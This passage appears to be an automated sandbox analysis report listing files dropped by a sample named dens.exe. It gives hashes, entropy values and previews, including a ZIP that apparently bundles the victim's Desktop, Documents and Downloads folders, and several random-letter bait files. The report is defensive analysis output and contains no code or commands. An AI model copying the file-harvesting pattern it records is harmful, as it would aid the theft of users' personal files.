                                                                                                                                                                                                                                            MD5:2DE3905B3C79C3EDDF4364EF98AE364A
                                                                                                                                                                                                                                            SHA1:A0C16CD8FF717AB74FC4C9FA14CE3EED4A8E0577
                                                                                                                                                                                                                                            SHA-256:5384BA4B1F750731AAC59739E2EE136AC42F6114E6D6C2E7905CF790895DD4F1
                                                                                                                                                                                                                                            SHA-512:92726E6A1E9E015BD12DFBBF10272E216B61162BD8C453566DD4D814BAAB92D2744AAE82DDE18787700E0C6D06BF141A29449FD41778E6334E38B0968BA1BA12
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:PK.........lY................DTBZGIOOSO/PK.........lY................Desktop/PK.........lY................Documents/PK.........lY................Downloads/PK.........lY................ONBQCLYSPU/PK.........lY................UMMBDNEQBN/PK.........lY................VLZDGUKUTZ/PK.........lY................XZXHAVGRAG/PK........Q@DW................Desktop/BPMLNOBVSB.jpg..I.E!.......8...N.?H.-.".Jt-.X....#......a....u...8z.)..R...'....?tD..d.5.%}..O;......yl..4...g..[.=V..Y.gJM....c..cb.EF......C;&.^R...p..<.rQ..R......Vz....|....C.x.b.O..$\&..23Xj%...\]....BJ....).fh..|.rD.<.8.d.....S4.eIg`.-.....~.Y.a&.........=..=6....S.hw...B.E.$v........iK..=../L..8...`....LK.X...'..X..7.....vy.q.6N[.|f..v.O<.=:b...9e.o+..:y....3tL..{u.g.y..t..p"..a.Y.X...L...4=..FI.."..2....,.-.2Vm....^..1$..:.*..v......i...qk..#...<uWtD._....@.....p...6....\w?dw.10..l.>.Z........).c.h.D..8.r......F....u...;=...Lcj...q....u...+.}'...-..._....Y..m.......~_/...v&.5.;cB.r.u"
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                            MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                            SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                            SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                            SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                            MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                            SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                            SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                            SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.702896917219035
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                                                                                                                                                                                                            MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                                                                                                                                                                                                            SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                                                                                                                                                                                                            SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                                                                                                                                                                                                            SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                            MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                            SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                            SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                            SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694985340190863
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                                                                                            MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                                                                                            SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                                                                                            SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                                                                                            SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695860210921229
                                                                                                                                                                                                                                            Encrypted:false
